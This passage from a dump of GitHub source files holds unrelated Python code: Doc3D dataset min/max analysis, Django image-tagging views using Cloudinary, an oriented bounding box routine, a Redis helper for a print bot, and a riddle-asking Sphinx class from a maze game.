ch2_maxs, ch2_mins, core_amount=core_amount, task_amount=task_amount, print_msg=print_msg)\n\n ### finish ~~ 開始show 結果囉\n ### 先整個list秀出來 大略看看 每個切出來的小task找的狀況\n print(\"ch0_maxs:\", ch0_maxs)\n print(\"ch0_mins:\", ch0_mins)\n print(\"ch1_maxs:\", ch1_maxs)\n print(\"ch1_mins:\", ch1_mins)\n print(\"ch2_maxs:\", ch2_maxs)\n print(\"ch2_mins:\", ch2_mins)\n print()\n\n ### list 轉 numpy,操作起來較方便(可以.max(), .min())\n ch0_maxs = np.array(ch0_maxs)\n ch0_mins = np.array(ch0_mins)\n ch1_maxs = np.array(ch1_maxs)\n ch1_mins = np.array(ch1_mins)\n ch2_maxs = np.array(ch2_maxs)\n ch2_mins = np.array(ch2_mins)\n\n ### 所有task 的min/max,即整個 DB 的min/max\n print(\"ch0_maxs.max()\", ch0_maxs.max())\n print(\"ch0_mins.min()\", ch0_mins.min())\n print(\"ch1_maxs.max()\", ch1_maxs.max())\n print(\"ch1_mins.min()\", ch1_mins.min())\n print(\"ch2_maxs.max()\", ch2_maxs.max())\n print(\"ch2_mins.min()\", ch2_mins.min())\n\n print(\"total_cost_time:\", time.time() - start_time)\n \"\"\"\n doc3d\n uv\n M ch0_maxs.max() 1.0\n M ch0_mins.min() 0.0\n y ch1_maxs.max() 1.0\n y ch1_mins.min() 0.0\n x ch2_maxs.max() 1.0000006\n x ch2_mins.min() 0.0\n total_cost_time: 4322.7983639240265\n\n wc\n z ch0_maxs.max() 0.63452387\n z ch0_mins.min() -0.67187124\n x ch1_maxs.max() 1.2387834\n x ch1_mins.min() -1.2280148\n y ch2_maxs.max() 1.2485291\n y ch2_mins.min() -1.2410645\n total_cost_time: 4970.9831392765045\n total_cost_time: 4822.389922380447\n total_cost_time: 5963.885419368744 ### 2022/05/04\n\n ### DewarpNet裡寫的數值: 1.2539363, -1.2442188, 1.2396319, -1.2289206, 0.6436657, -0.67492497 # RGB -> BGR\n\n kong_doc3d(驗算一下, 順便看 kong_doc3d 有沒有寫對)\n uv\n ch0_maxs.max() 
1.0\n ch0_mins.min() 0.0\n ch1_maxs.max() 1.0\n ch1_mins.min() 0.0\n ch2_maxs.max() 1.0000006\n ch2_mins.min() 0.0\n total_cost_time: 7074.6238849163055\n wc\n # ch0_maxs.max() 0.63452387\n # ch0_mins.min() -0.67187124\n # ch1_maxs.max() 1.2387834\n # ch1_mins.min() -1.2280148\n # ch2_maxs.max() 1.2485291\n # ch2_mins.min() -1.2410645\n # total_cost_time: 5963.885419368744\n\n v2\n wc 1~15\n ch0_maxs.max() 0.46694446\n ch0_mins.min() -0.50429183\n ch1_maxs.max() 1.2485291\n ch1_mins.min() -1.2410645\n ch2_maxs.max() 1.2280148\n ch2_mins.min() -1.2387834\n total_cost_time: 139.42432951927185\n\n wc 15~21\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2394472\n ch1_mins.min() -1.2396094\n ch2_maxs.max() 1.2273213\n ch2_mins.min() -1.2297894\n total_cost_time: 2367.5690183639526\n\n wc 16~21\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2385225\n ch1_mins.min() -1.2396094\n ch2_maxs.max() 1.2273213\n ch2_mins.min() -1.2297894\n total_cost_time: 254.20641613006592\n\n wc 1~21\n ch0_maxs.max() 0.46694446\n ch0_mins.min() -0.50429183\n ch1_maxs.max() 1.2485291\n ch1_mins.min() -1.2410645\n ch2_maxs.max() 1.2280148\n ch2_mins.min() -1.2387834\n 目前用看的\n\n wc 19\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2300093\n ch1_mins.min() -1.229918\n ch2_maxs.max() 1.2098893\n ch2_mins.min() -1.2277281\n total_cost_time: 14.63512635231018\n \"\"\"\n\ndef _F_ow_W_ch_min_max_multiprocess(data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins, core_amount, task_amount, print_msg=False):\n multi_processing_interface(core_amount=core_amount, task_amount=task_amount, task=_F_ow_W_ch_min_max, task_args=[data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins], print_msg=print_msg)\n\ndef _F_ow_W_ch_min_max(start_index, amount, data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins):\n '''\n 主要做事的地方在這裡喔!\n '''\n datas = []\n # start_index = 0\n # amount = 100\n for i, file_path in enumerate(tqdm(data_paths[start_index:start_index + amount])):\n # print(i, file_path)\n # print(i, file_path[-4:])\n if (\".exr\" in file_path[-4:].lower()): datas.append(cv2.imread(file_path, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED))\n elif(\".npy\" in file_path[-4:].lower()): datas.append(np.load(file_path))\n elif(\".jpg\" in file_path[-4:].lower() or\n \".png\" in file_path[-4:].lower()): datas.append(cv2.imread(file_path))\n\n datas = np.array(datas) ### list 轉 numpy\n # print(datas.shape)\n # print(\"ch0 max:\", datas[..., 0].max())\n # print(\"ch0 min:\", datas[..., 0].min())\n # print(\"ch1 max:\", datas[..., 1].max())\n # print(\"ch1 min:\", datas[..., 1].min())\n # print(\"ch2 max:\", datas[..., 2].max())\n # print(\"ch2 min:\", datas[..., 2].min())\n # print()\n ch0_maxs.append( datas[..., 0].max())\n ch0_mins.append( datas[..., 0].min())\n ch1_maxs.append( datas[..., 1].max())\n ch1_mins.append( datas[..., 1].min())\n ch2_maxs.append( datas[..., 2].max())\n ch2_mins.append( datas[..., 2].min())\n############################################################################################################################################\n############################################################################################################################################\n############################################################################################################################################\n\ndef wc_2D_3D_and_uv_visual(wc_paths, uv_paths, page_names_w_dir, dst_dir):\n 
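# Build the 2D/3D world-coordinate and UV output folders (one sub-folder per dir 1..21), render every sample with multiprocessing, then convert the saved PNGs to JPG.\n    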
start_time = time.time()\n wc_2d_dst_dir = dst_dir + \"/\" + \"wc_visual_2D\"\n wc_3d_dst_dir = dst_dir + \"/\" + \"wc_visual_3D\"\n uv_2d_dst_dir = dst_dir + \"/\" + \"uv_visual_2D\"\n Check_dir_exist_and_build(wc_2d_dst_dir)\n Check_dir_exist_and_build(wc_3d_dst_dir)\n Check_dir_exist_and_build(uv_2d_dst_dir)\n for dir_index in range(21):\n dir_name = dir_index + 1\n Check_dir_exist_and_build_new_dir(wc_2d_dst_dir + \"/%i\" % dir_name)\n Check_dir_exist_and_build_new_dir(wc_3d_dst_dir + \"/%i\" % dir_name)\n Check_dir_exist_and_build_new_dir(uv_2d_dst_dir + \"/%i\" % dir_name)\n\n\n core_amount = datas_amount // 70\n task_amount = datas_amount\n _wc_2D_3D_and_uv_visual_multiprocess(wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir, core_amount=core_amount, task_amount=task_amount)\n\n\n for dir_index in range(21):\n dir_name = dir_index + 1\n Save_as_jpg(wc_2d_dst_dir + \"/%i\" % dir_name, wc_2d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n Save_as_jpg(wc_3d_dst_dir + \"/%i\" % dir_name, wc_3d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n Save_as_jpg(uv_2d_dst_dir + \"/%i\" % dir_name, uv_2d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n print(\"total_cost_time:\", time.time() - start_time)\n\ndef _wc_2D_3D_and_uv_visual_multiprocess(wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir, core_amount, task_amount):\n multi_processing_interface(core_amount=core_amount, task_amount=task_amount, task=_wc_2D_3D_and_uv_visual, task_args=[wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir], print_msg=True)\n\ndef _wc_2D_3D_and_uv_visual(start_index, amount, wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir):\n for i in tqdm(range(start_index, start_index + amount)):\n # print(i, file_path)\n uv = cv2.imread(uv_paths[i], cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED) ### 這行就可以了!\n mask = uv[..., 0]\n wc = cv2.imread(wc_paths[i], cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED) ### 這行就可以了!\n wc_3D_good_to_v = wc[..., ::-1] ### 嘗試幾次後,這樣子比較好看\n\n wc_3d_dst_path = wc_3d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = wc_3d_plot(wc_3D_good_to_v, mask, fewer_point=True, small_size=(300, 300), ax_size=5)\n plt.savefig(wc_3d_dst_path)\n\n wc_2d_dst_path = wc_2d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = wc_2d_plot(wc, figsize=(5, 5))\n plt.savefig(wc_2d_dst_path)\n plt.close()\n\n uv_2d_dst_path = uv_2d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = uv_2d_plot(uv[..., ::-1], figsize=(5, 5))\n plt.savefig(uv_2d_dst_path)\n plt.close()\n\n############################################################################################################################################\n############################################################################################################################################\n\nif(__name__ == \"__main__\"):\n from step0_Doc3D_obj import real_doc3D\n from step0_Kong_Doc3D import kong_doc3D\n using_doc3D = kong_doc3D\n '''1_244_1-cp_Page_0995-mpT0001.exr'''\n ### 取得 wc_paths\n\n if (type(using_doc3D) == type(real_doc3D)):\n wc_paths = using_doc3D.wc_paths\n uv_paths = using_doc3D.uv_paths\n elif(type(using_doc3D) == type(kong_doc3D)):\n wc_paths = using_doc3D.wc_npy_paths\n uv_paths = using_doc3D.uv_npy_paths\n\n ### 設定 要處理的數量\n # datas_amount = 2000 #len(wc_paths) ### 少量測試時用的\n datas_amount = len(wc_paths)\n # print(\"datas_amount:\", datas_amount)\n 
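# Analysis 1 below computes channel-wise min/max over the whole DB; analysis 2 renders the WC/UV visualisations.\n    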
############################################################################################################\n\n ### 分析1:找 整個DB 所有 wc 各個channel 的 min/max\n # F_ow_W_ch_min_max(wc_paths, datas_amount, core_amount = datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(uv_paths, datas_amount, core_amount = datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(wc_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(uv_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n F_ow_W_ch_min_max(kong_doc3D.W_w_M_npy_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n\n ### 分析2\n # page_names_w_dir = using_doc3D.page_names_w_dir\n # wc_2D_3D_and_uv_visual(wc_paths, uv_paths, page_names_w_dir, dst_dir=r\"H:\")\n","repo_name":"KongBOy/kong_Doc3D","sub_path":"step2_analyze_wc_xyz_min_max.py","file_name":"step2_analyze_wc_xyz_min_max.py","file_ext":"py","file_size_in_byte":13665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36509870975","text":"from builtins import OSError, ValueError, len\n\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nimport cloudinary\nfrom django.contrib.auth.forms import UserCreationForm\nfrom PIL import Image\nfrom imageprocessor.tagservice.tagger import detect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom .forms import ImageForm\nfrom .models import Photo, Tag\n\n\nNO_TAGS_ERROR_MSG = \"We couldn't generate tags for that image. Please try a different photo\"\nBAD_FILE_ERROR_MSG = \"We can't process that file type. 
Please submit a different file\"\nCLOUDINARY_ERROR = \"We were able to generate tags for the image, but an error occured while attempting to save the image on our end\"\n\n\n# Create your views here.\ndef index(request):\n return render(request, 'index.html')\n\n\ndef tag_search(request):\n context = {}\n if request.method == 'POST':\n search_query = request.POST[\"tagsearch\"]\n search = 'resource_type:image AND tags=' + search_query\n\n result = cloudinary.Search() \\\n .expression(search) \\\n .with_field('tags') \\\n .max_results('10') \\\n .execute()\n\n images = []\n\n if result and 'resources' in result:\n for img in result[\"resources\"]:\n images.append(img[\"url\"])\n\n context['search_query'] = search_query\n context['images'] = images\n context['search_result'] = result\n\n return render(request, 'tagged_pictures.html', context)\n\n return render(request, 'tagsearch.html')\n\n\ndef tagged_pictures(request):\n return render(request, 'tagged_pictures.html')\n\n\ndef get_tags_for_single_image(request):\n tags = []\n try:\n open_image = Image.open(request.FILES.get('file'))\n tags = detect(open_image)\n\n # this line enables us to read from the file more than once\n request.FILES.get('file').seek(0)\n except ValueError:\n messages.add_message(request, messages.ERROR, NO_TAGS_ERROR_MSG)\n except OSError:\n messages.add_message(request, messages.ERROR, BAD_FILE_ERROR_MSG)\n return tags\n\n\ndef get_tags_for_image(request, img):\n tags = []\n try:\n open_image = Image.open(img)\n tags = detect(open_image)\n return tags\n except ValueError:\n messages.add_message(request, messages.ERROR, NO_TAGS_ERROR_MSG)\n except OSError:\n messages.add_message(request, messages.ERROR, BAD_FILE_ERROR_MSG)\n return tags\n\n\ndef upload_image_to_cloudinary(file, tags):\n file.seek(0)\n \n result = cloudinary.uploader.upload(\n file,\n use_filename=True,\n tags=tags,\n folder=settings.UPLOAD_FOLDER)\n\n #etag is unique identifier for picture\n etag = result.get('etag', None)\n try:\n # if it is the first time we uploaded image onto database, then we will rename public_ic with etag\n result = cloudinary.uploader.rename(result.get('public_id'), etag)\n except:\n # Exception will occur when same image is posted twice\n # Thus we will delete the uploaded image in the database\n cloudinary.api.delete_resources([result.get('public_id', None)])\n\n query = 'resource_type:image AND public_id='\n # We need to ensure that the database gets populated with the original photo, not the photo that was originally posted\n # This is because photo originally posted was deleted\n search_query = cloudinary.Search() \\\n .expression(query + etag) \\\n .execute()\n if (len(search_query[\"resources\"]) > 0):\n search_query['url'] = search_query[\"resources\"][0]['url']\n search_query['public_id'] = search_query[\"resources\"][0]['public_id']\n search_query['etag'] = result['etag']\n return search_query\n else:\n return result\n\ndef process_bulk_images(request):\n files = request.FILES.getlist('file')\n results = []\n for img in files:\n res = {}\n current_tag = get_tags_for_image(request, img)\n current_res = upload_image_to_cloudinary(img, current_tag)\n\n res['tags'] = current_tag\n res['url'] = current_res.get('url', None)\n res['public_id'] = current_res.get('public_id', None)\n results.append(res)\n return results\n\n\ndef process_single_image(request):\n data = {}\n generated_tags = get_tags_for_single_image(request)\n response_data = upload_image_to_cloudinary(request.FILES.get('file'), generated_tags)\n\n 
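# Package the generated tags together with the Cloudinary upload result (url / public_id) into one record.\n    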
data['tags'] = generated_tags or None\n data['url'] = response_data.get('url', None)\n data['public_id'] = response_data.get('public_id', None)\n\n return [data]\n\n\n\ndef classify(request):\n form = ImageForm(request.POST or None, request.FILES or None)\n context = {'form' :form }\n if request.method == 'POST':\n image_count = len(request.FILES.getlist('file'))\n context['results'] = process_single_image(request) if image_count <= 1 else process_bulk_images(request)\n if request.user.is_authenticated:\n for result in context['results']:\n new_photo = Photo(url = result['url'], user = request.user, title = request.POST.get(\"title\", \"\") )\n new_photo.save()\n new_photo.create_related_tags(result['tags'])\n return render(request, 'input.html', context)\n\n\ndef register(request):\n context = {}\n form = UserCreationForm(request.POST or None)\n if request.method == 'POST':\n try:\n new_user = form.save()\n new_user.save()\n except:\n messages.add_message(request, messages.ERROR, \"user not added \")\n return HttpResponseRedirect(reverse('login'))\n context['form'] = form\n return render(request, 'register.html', context)\n\n@login_required(login_url='/registration/login/')\ndef view_my_pictures(request):\n context = {'my_pictures' : Photo.objects.filter(user = request.user)}\n return render(request, 'view_my_pictures.html', context)\n\nclass ClassifyAPI(APIView):\n\n def post(self, request, format=None):\n response_data = { 'results': None } \n results = []\n \n image_files = request.FILES.getlist('file')\n if len(image_files) < 1:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n else:\n for image_file in image_files:\n result = {\n 'status': None,\n 'error_message': None,\n 'name': image_file.name,\n 'public_id': None,\n 'url' : None,\n 'tags' : []\n }\n try:\n image = Image.open(image_file)\n tags = detect(image)\n result['tags'] = tags\n try:\n current_res = upload_image_to_cloudinary(image_file, tags)\n result['url'] = current_res.get('url', None)\n result['public_id'] = current_res.get('public_id', None)\n result['status'] = status.HTTP_200_OK\n except:\n result['status'] = status.HTTP_202_ACCEPTED\n result['error_message'] = CLOUDINARY_ERROR\n except ValueError:\n result['status'] = status.HTTP_204_NO_CONTENT\n result['error_message'] = NO_TAGS_ERROR_MSG\n except OSError:\n result['status'] = status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n result['error_message'] = BAD_FILE_ERROR_MSG\n except:\n result['status'] = status.HTTP_400_BAD_REQUEST\n \n results.append(result)\n \n response_data['results'] = results\n return Response(data=response_data, status=status.HTTP_207_MULTI_STATUS)\n \n\n\n","repo_name":"PhotoTagger/django-initial","sub_path":"imageprocessor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37193147119","text":"from Core.BasicDefs import *\nfrom Core.Utils.LinearAlgebra import *\nfrom Core.Geometry.Intersections import IntersectLines\n\nimport math\n\n\ndef _GetExtremePointIndices( vertices ):\n maxPt = [ float('-inf'), float('-inf') ]\n minPt = [ float('inf'), float('inf') ]\n indices = [-1] * 4\n\n INDEX = INDICES()\n \n for ix, vertex in enumerate( vertices ):\n if vertex[INDEX.X] < minPt[INDEX.X]:\n minPt[INDEX.X] = vertex[INDEX.X]\n indices[INDEX.LEFT] = ix\n if vertex[INDEX.X] > maxPt[INDEX.X]:\n maxPt[INDEX.X] = vertex[INDEX.X]\n indices[INDEX.RIGHT] = ix\n if vertex[INDEX.Y] < minPt[INDEX.Y]:\n minPt[INDEX.Y] = 
vertex[INDEX.Y]\n indices[INDEX.BOTTOM] = ix\n if vertex[INDEX.Y] > maxPt[INDEX.Y]:\n maxPt[INDEX.Y] = vertex[INDEX.Y]\n indices[INDEX.TOP] = ix\n\n return indices\n\ndef _GetBox( caliperDirs, edgeIndices, vertices ):\n INDEX = INDICES()\n box = [None] * 4\n box[INDEX.LEFT] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.LEFT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.TOP]] )\n box[INDEX.BOTTOM] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.LEFT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.BOTTOM]] )\n box[INDEX.RIGHT] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.RIGHT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.BOTTOM]] )\n box[INDEX.TOP] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.RIGHT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.TOP]] ) \n\n area = ( Distance( box[INDEX.LEFT], box[INDEX.BOTTOM] ) *\n Distance( box[INDEX.LEFT], box[INDEX.TOP] ) )\n\n return box, area\n \ndef GetOrientedBBox( vertices, edges ):\n minBox = None\n minArea = float('inf')\n\n edgeIndices = _GetExtremePointIndices( vertices )\n caliperDirs = [ vector( [0, -1] ), vector( [1, 0] ) ]\n\n for i in range( len( vertices ) ):\n angles = [ np.dot( caliperDirs[ix % 2], edges[ edgeIndices[ ix ] ] ) ** 2 for ix in range(4) ]\n\n print(angles)\n minAngleIx = angles.index( max( angles ) )\n minCaliperIx = minAngleIx % 2\n\n caliperDirs[minCaliperIx] = edges[ edgeIndices[minAngleIx] ]\n caliperDirs[ ( minCaliperIx + 1 ) % 2 ] = GetOrthogonal( caliperDirs[minCaliperIx] )\n edgeIndices[ minAngleIx ] = ( edgeIndices[minAngleIx] + 1 ) % len(vertices)\n\n box, area = _GetBox( caliperDirs, edgeIndices, vertices )\n\n## with open( '../Output/Boxes/Box{}.txt'.format(i), 'w', encoding='utf-8' ) as f: \n## for j in box:\n## print( '{}, {}'.format( j[0], j[1] ), file = f)\n## print( edgeIndices )\n \n if area < minArea:\n minArea = area\n minBox = box\n\n return minBox\n","repo_name":"OHUSAR/OrientedBoundingBoxes","sub_path":"Source/Core/BoundingVolumes/OrientedBoundingBox.py","file_name":"OrientedBoundingBox.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70517940074","text":"import redis\r\nimport buu_config, buu_model\r\nfrom buu_model import class_model\r\nimport datetime\r\n\r\nclass class_database_op(object):\r\n\r\n def __init__(self):\r\n self.config = buu_config.config\r\n self.redis_ins = redis.Redis(host = self.config.redis_addr, port = self.config.redir_port, \\\r\n db = self.config.redis_db, password = self.config.redis_password)\r\n\r\n def flush_redis(self):\r\n self.redis_ins.flushdb()\r\n\r\n def put_user(self, userName):\r\n exist_userId = self.redis_ins.get('user-username-id-' + userName)\r\n if not exist_userId:\r\n exist_user = class_model.User(userName = userName)\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return int(userId)\r\n else:\r\n return exist_userId\r\n\r\n def update_user(self, userName, userId):\r\n userId = int(userId)\r\n\r\n if self.redis_ins.get('user-id-username-' + str(userId)):\r\n if str(self.redis_ins.get('user-id-username-' + str(userId)).decode('utf-8')) == userName and \\\r\n int(self.redis_ins.get('user-username-id-' + userName)) == userId:\r\n return None\r\n\r\n try:\r\n exist_user = 
class_model.User.select(class_model.User.q.id == userId).limit(1).getOne()\r\n exist_user.set(userName = userName)\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return None\r\n except Exception:\r\n exist_user = class_model.User(userName = userName)\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return int(userId)\r\n\r\n def get_username_by_id(self, userId):\r\n userId = int(userId)\r\n exist_userName = self.redis_ins.get('user-id-username-' + str(userId))\r\n if exist_userName:\r\n return exist_userName.decode('utf-8')\r\n\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.id == int(userId)).limit(1).getOne()\r\n self.redis_ins.set('user-id-username-' + str(userId), exist_user.userName)\r\n self.redis_ins.set('user-username-id-' + exist_user.userName, userId)\r\n return exist_user.userName\r\n except Exception:\r\n return None\r\n\r\n def get_user_by_id(self, userId):\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.id == int(userId)).limit(1).getOne()\r\n return exist_user\r\n except Exception:\r\n return None\r\n\r\n\r\n def get_id_by_username(self, userName):\r\n exist_userId = self.redis_ins.get('user-username-id-' + userName)\r\n if exist_userId:\r\n return exist_userId\r\n\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.userName == userName).limit(1).getOne()\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return userId\r\n except Exception:\r\n return None\r\n\r\n def get_user_current_step(self, userId):\r\n step = self.redis_ins.get('step-' + str(userId))\r\n if step:\r\n return step.decode('utf-8')\r\n\r\n return '0'\r\n\r\n def set_user_current_step(self, userId, step):\r\n self.redis_ins.set('step-' + str(userId), step)\r\n\r\n def step_back(self, userId):\r\n for single_key in self.config.fail_clean:\r\n self.delete_redis_kv(userId, single_key)\r\n cur_step = self.get_user_current_step(userId)\r\n stop_pos = cur_step.rfind('-')\r\n if stop_pos != -1:\r\n cur_step = cur_step[:stop_pos]\r\n else:\r\n cur_step = '0'\r\n self.set_user_current_step(userId, cur_step)\r\n\r\n def set_redis_kv(self, userId, key, value):\r\n self.redis_ins.set('custom-' + str(userId) + '-' + str(key), value)\r\n\r\n def get_redis_kv(self, userId, key):\r\n return self.redis_ins.get('custom-' + str(userId) + '-' + str(key))\r\n\r\n def delete_redis_kv(self, userId, key):\r\n self.redis_ins.delete('custom-' + str(userId) + '-' + str(key))\r\n\r\n\r\n\r\n def add_printer_info(self, userId, printer_name, printer_type, printer_value):\r\n try:\r\n class_model.Printer(printer_type = printer_type, printer_name = printer_name, printer_value = printer_value, user = self.get_user_by_id(userId))\r\n except Exception:\r\n pass\r\n\r\n def get_my_printers(self, userId):\r\n try:\r\n exist_printers = class_model.Printer.select(class_model.Printer.q.user == self.get_user_by_id(userId))\r\n return exist_printers\r\n except Exception:\r\n return None\r\n\r\n def delete_my_printer(self, userId, printerId):\r\n try:\r\n exist_printer = class_model.Printer.select((class_model.Printer.q.user == self.get_user_by_id(userId)) & (class_model.Printer.q.id == printerId)).limit(1).getOne()\r\n class_model.Printer.delete(exist_printer.id)\r\n return True\r\n 
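# A missing printer or failed delete raises here; the except below maps that to False.\r\n        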
except Exception:\r\n return False\r\n\r\n def get_all_printers(self, userId):\r\n try:\r\n exist_printers = class_model.Printer.select()\r\n return exist_printers\r\n except Exception:\r\n return None\r\n\r\n def get_printer(self, printerId):\r\n try:\r\n exist_printer = class_model.Printer.select(class_model.Printer.q.id == printerId).limit(1).getOne()\r\n return exist_printer\r\n except Exception:\r\n return None\r\n\r\n def add_print_job(self, page_num, file_name, user, printer):\r\n try:\r\n job = class_model.PrintJob(page_num = page_num, file_name = file_name, user = user, printer = printer, timestamp = datetime.datetime.now())\r\n return job.id\r\n except Exception:\r\n return None\r\n\r\n def get_print_job_total(self, printerId):\r\n try:\r\n return int(class_model.PrintJob.select(class_model.Printer.q.id == printerId).sum('page_num')) * self.config.print_price\r\n except Exception:\r\n return 0\r\n","repo_name":"glzjin/wechat_print_bot","sub_path":"buu_database.py","file_name":"buu_database.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"19652531370","text":"import os, random\n\nfrom personnage import Personnage\nfrom labyrinthe.labyrinthe import Labyrinthe\nfrom joueur import Joueur\n\n\nclass Sphinx(Personnage):\n \"\"\" Cette classe représente la sortie du jeu \"\"\"\n joueur = Joueur.getInstance(\"👤\", \"X\", 100)\n labyrinthe = Labyrinthe.getInstance()\n\n __instance = None\n\n @staticmethod\n def getInstance():\n if Sphinx.__instance is None:\n Sphinx.__instance = Sphinx()\n return Sphinx.__instance\n\n def __init__(self):\n \" Constructeur. Paramètres :\"\n self._symboleWindowsTerminal = \"🦅\"\n self._symbole = \"T\"\n self._questions = {\n \"Quel est l'être doué de la voix qui a quatre pieds le matin, deux à midi et trois le soir ?\": [\"l'homme\",\"nous\",\"l'humain\",\"humain\",\"homme\"],\n \"Je ne peux pas marcher, j’ai pourtant un dos et quatre pieds. Qui suis-je ?\": [\"une chaise\", \"chaise\"],\n \"\"\"Un homme se réveille chez lui, dans le noir complet. Dans son tiroir, il y a 6 chaussettes noires, 4 blanches et deux rouges.\\n \n Combien doit-il prendre de chaussettes au minimum pour être certain d’avoir deux chaussettes de la même couleur ?\"\"\": [\n \"quatre\", \"4\"],\n \"Qu’est-ce qui est jaune avec une cape ?\": [\"une banane\", \"banane\"],\n \"je suis noir, je deviens rouge, et je finis blanc.\\nQui suis-je?\": [\"le charbon\", \"charbon\"],\n \"lisez cette chaine: g-k-c-1-9-i-r\": [\"j'ai cassé un neuf hier\"]\n }\n\n def description(self):\n \"\"\" Renvoie la description du sphinx.\"\"\"\n return \"L'animal mythologique représentant votre liberté!!!\"\n\n def parler(self, joueur):\n if Sphinx.joueur.getCle() >= 10:\n print(\"*le Sphinx vous pose une question pour verifier la légitimité de votre liberté...*\")\n question = random.choice(list(self._questions.keys()))\n reponse = input(question).lower()\n for response in self._questions[question]:\n if reponse == response:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"\"\"\n .____ ._____. 
__ __ \n | | |__\\_ |__ ____________/ |_ __/_ \n | | | || __ \\_/ __ \\_ __ \\ __\\/ __ \\ \n | |___| || \\_\\ \\ ___/| | \\/| | \\ ___/ \n |_______ \\__||___ /\\___ >__| |__| \\___ >\n \\/ \\/ \\/ \\/ \n \"\"\")\n exit(0)\n print(\"*Le Sphinx vous vole une clé et s'envole *\")\n print(\"Sphinx-> Retourner à vos occupations, retrouver la clé volée, et revenez vers moi...\")\n Sphinx.joueur.perdreCle()\n Sphinx.labyrinthe.deposerPersonneAleatoirement(self.getInstance(), Sphinx.joueur)\n Sphinx.joueur.getCaseCourante().supprimerPersonnage(self.getInstance())\n Sphinx.joueur.reinitionalisationDecouverte()\n else:\n print(\"Il vous manque encore \" + str(10 - int(Sphinx.joueur.getCle())) + \"clef !!!\")\n print(\"Continuer à les chercher...\")\n input()\n\n def rencontrer(self):\n pass\n\n def getSymbole(self, isWindowsTerminal):\n if isWindowsTerminal:\n return self._symboleWindowsTerminal\n else:\n return self._symbole\n","repo_name":"greggameplayer/PyTheMaze","sub_path":"personnes/sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74859881512","text":"import datetime, os, unittest\nimport requests\nimport pdb\n\nimport bs4\n\nfrom app.get_express_scripts_pdfs import ExpressScriptsPDF\nfrom app.helpers.universal import Helpers\n\n\nclass 